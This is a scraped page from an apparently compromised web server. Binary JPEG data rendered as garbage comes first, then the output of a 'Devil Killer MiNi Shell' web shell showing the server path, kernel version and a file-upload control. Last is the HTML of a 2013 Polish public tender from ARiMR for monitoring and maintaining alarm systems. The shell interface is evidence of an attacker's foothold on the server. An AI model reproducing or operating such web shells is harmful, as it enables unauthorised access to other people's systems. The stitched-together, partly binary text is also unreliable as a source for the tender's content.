JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131202/493524-N-2013.html

<p class="kh_header"><b>Szczecin: Usługa monitoringu elektronicznego systemów alarmowych wraz z przeglądami i naprawami związanymi z utrzymaniem systemów w  obiektach Zachodniopomorskiego Oddziału Regionalnego i podległych 17 Biurach Powiatowych Agencji Restrukturyzacji i Modernizacji Rolnictwa</b><br>
<b>Numer ogłoszenia: 493524 - 2013; data zamieszczenia: 02.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Restrukturyzacji i Modernizacji Rolnictwa Zachodniopomorski Oddział Regionalny , ul. Szafera 10, 71-245 Szczecin, woj. zachodniopomorskie, tel. 91 4698400, faks 91 4394763.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.arimr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Agencja wykonawcza.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa monitoringu elektronicznego systemów alarmowych wraz z przeglądami i naprawami związanymi z utrzymaniem systemów w  obiektach Zachodniopomorskiego Oddziału Regionalnego i podległych 17 Biurach Powiatowych Agencji Restrukturyzacji i Modernizacji Rolnictwa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest świadczenie przez Wykonawcę usług ochrony polegających na sprawowaniu  monitoringu elektronicznego systemów alarmowych Zamawiającego znajdujących się w lokalizacjach Zachodniopolskiego Oddziału Regionalnego i podległych 17 Biurach Powiatowych na terenie województwa zachodniopomorskiego wraz z przeglądami i naprawami związanymi z utrzymaniem systemów alarmowych w obiektach. 
2.Wykaz lokalizacji objętych usługą wskazano w opisie przedmiotu zamówienia rozdział III pkt 14 Specyfikacji Istotnych Warunków Zamówienia (dalej SIWZ) oraz w  załączniku nr 1 do projektu umowy, stanowiącej załącznik nr 6 do  SIWZ.
3.Przedmiot zamówienia obejmuje:  
1)stały monitoring elektroniczny systemów alarmowych Zamawiającego w zakresie ochrony przed włamaniem i pożarem, na podstawie sygnałów transmitowanych przez zastosowane systemy alarmowe,
2)gromadzenie i przechowywanie danych dotyczących zdarzeń zarejestrowanych przez urządzenia systemów alarmowych przez okres realizacji zamówienia i udostępniania informacji Zamawiającemu na jego żądanie,
3)zapewnienie działań grup interwencyjnych w sytuacji otrzymania zgłoszenia z systemu alarmowego,
4)dokonywanie okresowych przeglądów użytkowanych Systemów Sygnalizacji Włamania i Napadu zwanych dalej SSWiN oraz sygnalizacji ppoż.  pod względem poprawności ich działania i zgłaszanie usterek Zamawiającemu,
5) wykonanie napraw i usuwanie usterek związanych z utrzymaniem systemów SSWiN oraz sygnalizacji ppoż.   
4.W poszczególnych lokalizacjach Zamawiającego funkcjonuje  system alarmowy, w skład którego wchodzi w Zachodniopomorskim Oddziale Regionalnym System Sygnalizacji Włamania i Napadu (SSWiN) wraz  z czujkami ruchu, magnetycznymi oraz wykrywania dymu i gazu podłączonymi jako monitoring stały natomiast w biurach powiatowych funkcjonuje system alarmowy w skład którego wchodzą SSWiN wraz z czujkami ruchu, magnetycznymi, dymu i zalania wodą. 
W Zachodniopomorskim Oddziale Regionalnym system alarmowy oparty jest o centralę SATEL Integra 128 i Integra 64 w biurach powiatowych w oparciu o centralę SATEL CA64 lub Integra 64 w przypadku Biura Powiatu Polickiego. Wykaz elementów systemu alarmowego określono w rozdziale III pkt 14 SIWZ. 
5.Podłączenie centrum monitorowania alarmów Wykonawcy do systemów alarmowych Zamawiającego musi zapewniać prawidłową i niezawodną transmisję sygnałów i być wykonane przez osoby upoważnione przez Wykonawcę do realizacji przedmiotu zamówienia,  posiadające wymagane uprawnienia określone w ustawie z dnia 22 sierpnia 1997r. o ochronie osób mienia (t.j. Dz.U. z 2005r. Nr 145, poz. 1221 ze zm.). 
6.Minimalne wymagania dotyczące stacji monitorującej alarm Wykonawcy, obsługującej obiekty Zamawiającego wskazanych w niniejszej specyfikacji:
1) automatyczne wyświetlanie zgłoszenia z systemów alarmowych, identyfikowanie miejsca i rodzaju powstania alarmu,
2) wysyłanie sygnałów testowych do obiektów, w przypadku opóźnień generowania zgłoszenia,
3) możliwość generowania raportów poszczególnych systemów alarmowych (data, godzina aktywacji/dezaktywacji systemu wraz z identyfikatorem użytkownika),
4) możliwość bieżącego podglądu systemów alarmowych,
5) możliwość gromadzenia i przechowywania danych o zdarzeniach i alarmach przez 3 miesiące od ich zarejestrowania.
7.Tor transmisji pomiędzy systemami alarmowymi, a stacjami monitorującymi zapewnia Wykonawca.  
Wykonawca zapewnia łączność, przy czym centralki w biurach powiatowych i oddziale regionalnym muszą zostać wyposażone w nadajniki sygnału. Koszty oferowanej usługi monitoringu powinny zawierać opłaty telekomunikacyjne. W przypadku konieczności korzystania z łączności GSM karty SIM muszą być aktywowane na Wykonawcę.
8.W ramach realizacji przedmiotu zamówienia obejmujących zakres wskazany w pkt 2 ppkt 1-3/III rozdziału SIWZ, Wykonawca zobowiązany jest do:
1)radiowego i telefonicznego monitorowania obiektów,
2)kontrolowania czasu załączeń i wyłączeń systemów alarmowych w ramach monitorowanych obiektów oraz powiadamianie osób upoważnionych, wskazanych w załączniku nr 9 do projektu umowy, o braku załączenia systemu alarmowego po godz. 20.30 w dni robocze u Zamawiającego oraz w innych szczególnych sytuacjach. W przypadku dokonania zmiany wyznaczonego czasu załączeń systemu alarmowego, Zamawiający każdorazowo poinformuje o tym fakcie niezwłocznie pisemnie lub telefonicznie osobę wskazaną do kontaktu ze strony Wykonawcy,
3)sprawdzania stanu linii transmisyjnych wykorzystywanych do monitorowania i wykrywania ich uszkodzeń,
4)telefonicznego sprawdzania sytuacji w obiekcie po wywołanym alarmie w czasie godzin pracy (dyspozytor Wykonawcy telefonuje pod wskazany numer, sprawdza przyczynę i  okoliczność alarmu) a po godzinach pracy interwencja patrolu,
5)reagowania grup interwencyjnych maksymalnie w ciągu 10 min w sytuacji wykrycia przez zainstalowany system stanu zagrożenia, ponadto:
a)zawiadamiania Policji lub innych właściwych służb o wszelkich zdarzeniach powodujących lub mogących powodować zagrożenie dla monitorowanego mienia lub osób znajdujących się w monitorowanych obiektach,
b)zawiadamiania osób upoważnionych przez Zamawiającego wskazanych w załączniku nr 9 do projektu umowy o zaistniałych zdarzeniach stwarzających zagrożenie dla mienia Zamawiającego i osób znajdujących się w monitorowanych obiektach,
- w razie braku kontaktu z upoważnionymi pracownikami biura powiatowego pozostawienie patrolu i powiadomienie o zdarzeniu pracowników oddziału regionalnego wymienionych w załączniku nr 9 do projektu umowy,
c)zabezpieczenia lokalu w okresie od przybycia załogi interwencyjnej na miejsce zdarzenia do przybycia osób/osoby upoważnionych wskazanych dla danej lokalizacji 
w załączniku nr 9 do projektu umowy, lub innych osób upoważnionych przez Zamawiającego,
d)podejmowania wszelkich czynności i użycia wszelkich dopuszczalnych środków zmierzających do zapobieżenia przestępstwom, których następstwem byłyby straty w mieniu Zamawiającego, a także przeciwdziałania powstaniu lub zwiększeniu szkód wynikających z ewentualnych zaistniałych zdarzeń,
e)sporządzenia raportu z interwencji i przekazania kopii Zamawiającemu bez zbędnej zwłoki,  
6)ścisłej współpracy z upoważnionymi osobami Zamawiającego w celu właściwego wykonywania przedmiotu zamówienia,  
7)gromadzenia i przechowywania danych dotyczących zdarzeń zarejestrowanych przez urządzenia systemów alarmowych w trakcie realizacji zamówienia i udostępnianie ich Zamawiającemu na jego żądanie. 
9.W ramach realizacji przedmiotu zamówienia obejmującego zakres wskazany w pkt 2 ppkt 4/III rozdziału SIWZ, Wykonawca zobowiązany jest do:
1) wykonywania kwartalnych przeglądów okresowych użytkowanego sytemu SSWiN i p.poż.,  w tym konserwacji w ramach przeglądu należy wykonać w szczególności następujące czynności : 
a)sprawdzenie, czy wszystkie czujki są dostępne i nie są przesłonięte,
b)sprawdzenie poprawności działania czujek, w tym czyszczenie z osadów i brudu,
c)sprawdzenie poprawności działania centrali systemu,
d)sprawdzenie poprawności działania sygnalizatorów akustycznych i optycznych,
e)  sprawdzenie łączności z centrum monitorowania,
f)sprawdzenie, czy nadzorowanie uszkodzeń centralki systemu alarmowego lub czujek funkcjonuje prawidłowo,
g)sprawdzenie prawidłowości działania zasilania głównego i awaryjnego,
h)sprawdzenie czy wszystkie mocowania elementów systemu, połączenia kablowe są poprawne, nie są  uszkodzone i są odpowiednio zabezpieczone,
i)odnotowanie stwierdzonych nieprawidłowości w protokole wykonania usługi sporządzonym wg wzoru załącznika nr 4 do projektu umowy.
2)Wykonawca zobowiązany jest przesłać Zamawiającemu faxem lub elektronicznie harmonogram przeglądów systemów SSWiN i sygnalizacji ppoż. w poszczególnych lokalizacjach, wraz z uaktualnionym wykazem osób  upoważnionych  do realizacji przedmiotu umowy wg załącznika nr 10 do projektu umowy, w terminie nie krótszym niż 7 dni przed rozpoczęciem każdego z okresowych przeglądów, 
3)każdorazowe wykonanie przeglądu zostanie potwierdzone  protokołem wykonania usługi  sporządzonym wg wzoru stanowiącego załącznik nr 4 do umowy, podpisanym przez  osoby upoważnione ze strony Wykonawcy i Zamawiającego oraz przekazanie Zamawiającemu w terminie 7 dni roboczych od zakończenia ostatniego przeglądu,  protokoły wykonania usługi z każdej lokalizacji Zamawiającego, 
4)Wykonawca w przypadku wykrycia awarii systemu (usterki) o konieczności dokonania naprawy lub wymiany elementów  systemu SSWiN lub ppoż.,  zobowiązany jest do niezwłocznego zawiadomienia upoważnionego pracownika Zamawiającego telefonicznie a następnie potwierdzenia tego faktu w formie pisemnej faksem lub pocztą elektroniczną.   
10.W ramach realizacji przedmiotu zamówienia obejmującego zakres wskazany w pkt 2 ppkt 5/ III rozdziału SIWZ, Wykonawca zobowiązany jest do:
1) wykonywania napraw systemów alarmowych w przypadku wystąpienia awarii. Zamawiający o konieczności wykonania naprawy poinformuje Wykonawcę przesyłając zgłoszenie wg wzoru załącznika nr 5 do projektu umowy faksem lub elektronicznie.  
2)przystąpienia do usunięcia awarii/usterki w ciągu 24 h od zgłoszenia przez Zamawiającego z zastrzeżeniem postanowień pkt. 10 niniejszego rozdziału specyfikacji,  przy czym Wykonawca zobowiązany jest do wykonania naprawy w terminie uzgodnionym każdorazowo z Zamawiającym,
3)każdorazowe wykonanie naprawy zostanie potwierdzone protokołem odbioru wg wzoru stanowiącego załącznik nr 5a do projektu umowy, podpisanym przez upoważnione ze strony Wykonawcy i Zamawiającego osoby, 
4)każdorazowego uzgodnienia z Zamawiającym przewidywanego czasu naprawy systemu SSWiN lub ppoż. i przewidywanych kosztów naprawy,     
5)stosowania podczas wykonywanych napraw  elementów i urządzeń kompatybilnych z systemami zabezpieczeń Zamawiającego o jakości i parametrach nie gorszych od urządzeń i elementów wymienianych i wyszczególnionych w ofercie. Ponadto Wykonawca zobowiązany jest do stosowania podczas wykonywanych napraw wyłącznie nowe urządzenia, elementy oraz materiały posiadające wymagane prawem polskim i europejskim świadectwa jakości i certyfikaty w tym bezpieczeństwa lub inne dokumenty potwierdzające dopuszczenie do stosowania, 
6)w przypadku nienależytego wykonania naprawy, Zamawiający wskaże zastrzeżenia w protokole odbioru stanowiącym załącznik nr 5a do projektu umowy, a Wykonawca po uznaniu reklamacji zobowiązuje się do dokonania ponownej naprawy na własny koszt w terminie określonym przez Zamawiającego, 
7)Wykonawca udziela 12 miesięcy gwarancji na wykonane naprawy, a na zastosowane urządzenia, elementy zgodnie z gwarancją przewidzianą przez producenta,
8)Za usunięcie usterek i wykonywanie napraw Wykonawca rozliczany będzie na podstawie kosztów obejmujących w szczególności: 
a) koszty robocizny, w tym montaż nowych i demontaż starych  elementów systemu, skonfigurowanie montowanych elementów, urządzeń - liczony w roboczogodzinach ;
b) koszty materiałów, elementów, urządzeń, okablowania użytych do naprawy lub usunięcia usterki systemu - rozliczany wg cen jednostkowych wskazanych dla wybranych materiałów elementów, urządzeń systemu alarmowego lub ppoż. natomiast w przypadku materiałów nie ujętych w ofercie wg cen nie wyższych niż    
wynikających z cennika obowiązującego u Wykonawcy na dzień wykonywania naprawy; 
c) koszty dojazdu  do każdej z lokalizacji biura powiatowego lub oddziału regionalnego w przypadku każdorazowego zlecenia Wykonawcy naprawy systemu alarmowego lub usunięcia usterki - ryczałtowa cena.               
11.W przypadku wykrycia przez Wykonawcę uszkodzenia w działaniu systemu alarmowego w trakcie wykonywania okresowych przeglądów, naprawa zostanie wykonana po poinformowaniu Zamawiającego, wskazania przewidywanych  kosztów naprawy i uzyskaniu przez niego zgody telefonicznie, faksem lub elektronicznie na jej dokonanie. W takim przypadku, Wykonawca nie będzie naliczał ryczałtowego kosztu dojazdu przewidzianego za wykonywanie napraw, o którym mowa w wyżej.  
12.Wymagania dotyczące uruchomienia alarmu:
1)Wykonawca zobowiązuje się do niezwłocznej interwencji patrolu w przypadkach uruchomienia alarmu:
a)w dni robocze u Zamawiającego od poniedziałku do piątku w godzinach 15:30 - 7:30 oraz w godzinach 7:30 - 15:30 w razie braku odwołania alarmu,
b)w soboty, niedziele i święta - całodobowo,
2)po przybyciu do monitorowanego obiektu grupa interwencyjna:
- dokonuje wizji lokalnej obiektu,
- podejmuje działanie zmierzające do zapobieżenia powstania szkody lub zmniejszenia jej rozmiarów,
- niezwłocznie powiadamia organy ścigania o działaniach przestępczych zaistniałych w chronionym obiekcie i zabezpiecza miejsce oraz ślady przestępstwa,
-w przypadku wystąpienia pożaru: powiadamia straż pożarną i przystępuje, w miarę możliwości, do gaszenia pożaru,
3)w czasie godzin pracy Zamawiającego (od poniedziałku do piątku w godzinach 7:30 - 15:30), w przypadku uruchomieniu się alarmu, dyspozytor Wykonawcy zobowiązany jest sprawdzić telefonicznie pod wskazanym przez Zamawiającego numerem telefonu, przyczynę i okoliczności powstania alarmu, 
4)po godzinach pracy Zamawiającego, po uruchomieniu się alarmu dyspozytor Wykonawcy zobowiązany jest do wysyłania grupy interwencyjnej. W razie zaistnienia konieczności, (np. alarm ciągły, alarm uporczywie się powtarzający lub istnieje potrzeba wejść do obiektu), Wykonawca zawiadamia telefonicznie osobę upoważnioną przez Zamawiającego wymienioną w załączniku nr 8 do umowy dla danego obiektu  w celu podjęcia lub uzgodnienia dalszych działań,
5)w ramach kosztów monitorowania  obiektów, Zamawiający ma prawo do wywołania raz w roku w każdym obiekcie alarmu kontrolnego, mającego na celu sprawdzenie czasu reakcji grupy interwencyjnej Wykonawcy. Czas reakcji liczony jest od chwili pojawienia się alarmu w obiekcie do przybycia grupy interwencyjnej do obiektu.
13.W ramach realizacji  zamówienia Wykonawca zobowiązany będzie również do:
1)wykonywania przedmiotu zamówienia przez pracowników zabezpieczenia technicznego Wykonawcy, w tym przez podwykonawców, spełniających wymagania określone w ustawie z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (t.j. Dz.U. z 2005r. Nr 145, oz. 1221 ze zm.), w zakresie przeglądu systemów alarmowych i napraw i posiadają licencję pracownika zabezpieczenia technicznego co najmniej I lub II stopnia,  
2)zapewnienia osobom upoważnionym do wykonywania przedmiotu zamówienia umundurowania (dotyczy grup interwencyjnych) oraz oznakowania (identyfikator) umożliwiającego ich identyfikację, a także środków przymusu bezpośredniego, dozwolonych obowiązującym prawem,
3)Wykonawca przyjmuje odpowiedzialność za wszelkie szkody osobowe i majątkowe wyrządzone Zamawiającemu oraz osobom trzecim w związku z wykonywaniem, nie wykonaniem lub nienależytym wykonaniem przedmiotu zamówienia, a także w przypadku, gdy szkoda była wynikiem działania osób, którymi Wykonawca posługuje się przy realizacji niniejszej umowy, w tym podwykonawców.
4)zapoznania się z wyciągiem Zarządzenia Prezesa ARiMR dotyczącym bezpieczeństwa informacji, stanowiącym załącznik nr 7 do projektu umowy oraz potwierdzenia faktu zapoznania się z wyciągiem poprzez złożenie oświadczenia wg wzoru załącznika nr 8 do projektu umowy, przeszkolenia osób upoważnionych do realizacji przedmiotu zamówienia w zakresie zasad bezpieczeństwa informacji określonych w wyciągu z zarządzenia, o którym mowa wyżej, 
5)przekazania Zamawiającemu w dniu podpisania umowy lub najpóźniej w dniu podpisania protokołu zdawczo-odbiorczego (przekazania obiektu) pisemnego wykazu osób upoważnionych do realizacji zamówienia z podaniem kwalifikacji uprawniających ich do wykonywania zawodu oraz informowania 
o zmianie w wykazie osób upoważnionych do realizacji przedmiotu zamówienia na zasadach określonych w projekcie umowy,    
6)kontrolowania, ustalania i niezwłocznego powiadamiania Zamawiającego na piśmie o stwierdzonych uchybieniach w zabezpieczeniu technicznym obiektów.
7)zachowania w tajemnicy wszelkich informacji uzyskanych od Zamawiającego w związku z zawarciem i wykonywaniem niniejszej umowy,
8)ubezpieczenia się od odpowiedzialności cywilnej w zakresie prowadzonej działalności, na sumę gwarancyjną nie niższą niż 1 000 000,00 zł (słownie złotych: jeden milion 00/100) i przedłożenia Zamawiającemu uwierzytelnionej kopii opłaconej polisy przed podpisaniem umowy w sprawie niniejszego zamówienia publicznego, Wykonawca zobowiązany jest do posiadania ww. ubezpieczenia przez cały okres realizacji  zamówienia i złożenia u Zamawiającego uwierzytelnionej kopii nowej polisy przed datą wygaśnięcia poprzedniej lub innego dokumentu potwierdzającego zawarcie nowej umowy ubezpieczenia przez Wykonawcę w przypadku jej braku.    
14.Zamawiający zastrzega sobie prawo do zmiany lokalizacji Biur Powiatowych w ramach tego samego powiatu, w takim przypadku postanowienia zawarte w projekcie umowy - załącznik nr 6 do SIWZ nie ulegną zmianie. W przypadku zmiany lokalizacji Zamawiający niezwłocznie pisemnie zawiadomi o tym fakcie Wykonawcę, który zapewni ciągłość wykonywanych świadczeń stanowiących przedmiot zamówienia w danej lokalizacji.      
15.Zamawiający przewiduje objęcie usługą okresowego przeglądu kwartalnego dodatkowych czujek oraz pozostałych elementów SSWiN w ilości nie więcej niż 5% ilości zainstalowanych czujek, które w ramach potrzeb mogą zostać podłączone do istniejących systemów w obiektach Zamawiającego.  
16.Szczegółowe postanowienia regulujące realizację przedmiotu zamówienia zawarte są w projekcie umowy stanowiącym załącznik nr 6 do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.71.10.00-1, 35.12.00.00-1, 45.31.20.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunek posiadania uprawnień do wykonywania określonej działalności lub czynności zgodnej z charakterem niniejszego zamówienia, Zamawiający uzna Wykonawców, którzy posiadają aktualną koncesję w zakresie usług ochrony osób i mienia wydaną zgodnie z ustawą  z dnia 22  sierpnia  1997 r. o ochronie   osób i mienia (t.j. Dz.  U. z 2005 r. Nr 145, poz. 1221 ze zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunek posiadania wiedzy i doświadczenia do wykonania zamówienia Zamawiający uzna Wykonawców, którzy wykonali a w przypadku świadczeń okresowych lub ciągłych również wykonują w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwie główne usługi ochrony osób i mienia polegającej na usłudze monitoringu elektronicznego systemów alarmowych z zapewnieniem działania grup interwencyjnych, o wartości nie niższej niż 50 000,00 zł brutto każda. Dla celów niniejszego postępowania Zamawiający żąda, aby w wykazie głównych usług były wykazane tylko usługi w zakresie niezbędnym do wykazania spełnienia określonego warunku wiedzy i doświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie, Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia wg załącznika nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie, Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia wg załącznika nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie, Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia wg załącznika nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

